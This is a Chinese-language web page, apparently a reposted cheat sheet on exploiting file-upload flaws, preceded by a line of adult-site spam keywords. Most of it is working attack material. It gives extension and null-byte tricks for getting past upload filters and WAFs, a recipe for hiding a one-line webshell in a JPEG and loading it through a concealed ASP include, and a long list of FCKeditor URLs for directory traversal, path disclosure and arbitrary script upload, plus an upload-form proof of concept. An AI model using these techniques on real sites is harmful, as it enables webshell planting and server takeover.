压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

上傳漏洞

  客戶端防護

  1.客戶端防護用截包傳

  2、服務器端驗證:

  文件頭欺騙  content-Type: application

  改為image/jpeg或者在腳本上方加 Gif89a  首字母大寫

  3、擴展名繞過

  1.后綴名大小寫 asp asP

  2.IIS組件  1.asa 1.cer

  1.aspx;.jpg  1.asp;.jpg

  3.apache組件后綴名繞過WAF php.xxx XXX不能寫成Jpg,后綴寫111 222

  4.php解析  1.php3 1.php5

  5.nginx(只用在php中)  twins.php%00jpg

  6.ASP:1.aspx;1.jpg或者創(chuàng)建1.asp的文件夾,上傳改后的木馬1.jpg(或者在fider里面如果有topath的話嘗試,直接加目錄傳Jpg)

  4、00截斷  繞過WAF 安全狗

  1、改fidler     content-Length:值+1

  filename: ma.aspx .jpg

  改16進制文件名空格處的 20 改成 00

  5、%00  php 版本<5.3.4 所有語言都適用

  1.asp%00.jpg

  aspx一般不能用%00截斷

  利用DOS命令合成一句話

  http://www.yunsec.net/a/security/web/jbst/2012/0830/11276.html

  首先我們新建個文本:

  在文本里面寫入DOS命令:copy /b 1.jpg+1.txt 圖片馬.jpg

  合并成功后,我們傳到它網(wǎng)站里, 把你做好的圖片替換掉原來的圖片。

  然后隨便找個asp文件,插入以下代碼:

  <div style=”height=0px; width=0px; overflow=hidden”><!– #include file=image/圖片.jpg –></div>

  這個代碼就是調用圖片,用css定義了一個大小為0的盒子,超出這個大小的話就隱藏顯示

  比如:創(chuàng)建一個llsilver.asp,同級目錄下保存有綁定一句話的圖片(就是我們合并得到的那個圖片)

  llsilver.asp 內容是

  <div style=”height=0px; width=0px; overflow=hidden”><!– #include file=image/圖片.jpg –></div>

  其中的【image/圖片.jpg】就是llsilver.asp所在文件的文件夾image,圖片.jpg就是我們合并得到的那個文件。

  然后訪問llsilver.asp這個文件的時候就等于訪問一句話木馬。

  Fckeditor 漏洞

  http://lcx.cc/?i=1714

  http://www.tt001.org/thread-433-1-1.html

  1、查看編輯器版本:

  1./fckeditor/editor/dialog/fck_about.html

  2./FCKeditor/_whatsnew.html

  2. Version 2.2 版本:

  Apache+linux 環(huán)境下在上傳文件后面加個.突破!測試通過。

  2、爆絕對路徑:

  1./FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php  (支持php的通殺)

  2./FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx  (2.5可突破)

  3./FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

  3、遍歷目錄:

  1./FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

  Version 2.4.1 測試通過

  修改 CurrentFolder 參數(shù)使用 ../../來進入不同的目錄:

  /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

  根據(jù)返回的XML 信息可以查看網(wǎng)站所有的目錄。

  FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

  也可以直接瀏覽盤符:

  JSP 版本:

  FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

  4、jsp上傳

  1./FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

  2./FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

  5、Version <=2.4.2 For php 在處理PHP 上傳的地方并未對Media 類型進行上傳文件類型的控制,導致用戶上傳任意文件!將以下保存為html文件,修改action地址。

  以下是引用片段:

  <form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">

  Upload a new file:<br>

  <input type="file" name="NewFile" size="50">

  <br>

  <input id="btnUpload" type="submit" value="Upload">

  </form>

  6、 FCKeditor 文件上傳“.”變“_”下劃線的繞過方法:

  很多時候上傳的文件例如:shell.php.rar 或shell.php;.jpg 會變?yōu)閟hell_php;.jpg 這是新版FCK 的變化。試試上傳1.asp;jpg

  6.1:提交shell.php+空格繞過:

  不過空格只支持win 系統(tǒng) *nix 是不支持的[shell.php 和shell.php+空格是2 個不同的文件 未測試。

  6.2:繼續(xù)上傳同名文件可變?yōu)閟hell.php;(1).jpg 也可以新建一個文件夾,只檢測了第一級的目錄,如果跳到二級目錄就不受限制。

  7、 突破建立文件夾:

  1./FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

  2./FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

  3./FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

  8、 FCKeditor 中 test 文件的上傳地址:

  1.FCKeditor/editor/filemanager/browser/default/connectors/test.html

  2.FCKeditor/editor/filemanager/upload/test.html

  3.FCKeditor/editor/filemanager/connectors/test.html

  4.FCKeditor/editor/filemanager/connectors/uploadtest.html

  7.常用上傳地址

  1.FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

  2.FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

  3.FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 測試通過)

  JSP 版:

  FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

  注意紅色部分修改為 FCKeditor 實際使用的腳本語言,藍色部分可以自定義文件夾名稱也可以利用../..目錄遍歷,紫色部分為實際網(wǎng)站地址。

  8.其他上傳地址:

  1.FCKeditor/_samples/default.html

  2.FCKeditor/_samples/asp/sample01.asp

  3.FCKeditor/_samples/asp/sample02.asp

  4.FCKeditor/_samples/asp/sample03.asp

  5.FCKeditor/_samples/asp/sample04.asp

  一般很多站點都已刪除_samples 目錄,可以試試。

  FCKeditor/editor/fckeditor.html 不可以上傳文件,可以點擊上傳圖片按鈕再選擇瀏覽服務器即可跳轉至可上傳文件頁。

  9.列目錄漏洞也可助找上傳地址:

  Version 2.4.1 測試通過

  修改CurrentFolder 參數(shù)使用 ../../來進入不同的目錄

  /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

  根據(jù)返回的XML 信息可以查看網(wǎng)站所有的目錄。

  FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

  也可以直接瀏覽盤符:

  JSP 版本:

  FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

  10.爆路徑漏洞

  FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

  11. FCKeditor 被動限制策略所導致的過濾不嚴問題

  影響版本: FCKeditor x.x <= FCKeditor v2.4.3

  脆弱描述:

  FCKeditor v2.4.3 中File 類別默認拒絕上傳類型:

  html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

  Fckeditor 2.0 <= 2.2 允許上傳asa、cer、php2、php4、inc、pwml、pht 后綴的文件上傳后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而沒有使用$sExtension 為后綴.直接導致在win 下在上傳文件后面加個.來突破[未測試]!

  而在apache 下,因為"Apache 文件名解析缺陷漏洞"也可以利用之,另建議其他上傳漏洞中定義TYPE 變量時使用File 類別來上傳文件,根據(jù)FCKeditor 的代碼,其限制最為狹隘。

  在上傳時遇見可直接上傳腳本文件固然很好,但有些版本可能無法直接上傳可以利用在文件名后面加.點或空格繞過,也可以利用2003 解析漏洞建立xxx.asp文件夾或者上傳xx.asp;.jpg

  9、最古老的漏洞,Type文件沒有限制!

  我接觸到的第一個fckeditor漏洞了。版本不詳,應該很古老了,因為程序對type=xxx 的類型沒有檢查。我們可以直接構造上傳把type=Image 改成Type=hsren 這樣就可以建立一個叫hsren的文件夾,一個新類型,沒有任何限制,可以上傳任意腳本!

  10、browser:

  1.fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp

  2.FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

 

上一篇:安卓防火墻 PS DroidWall

下一篇:Linux下由于子進程繼承引起的安全問題分析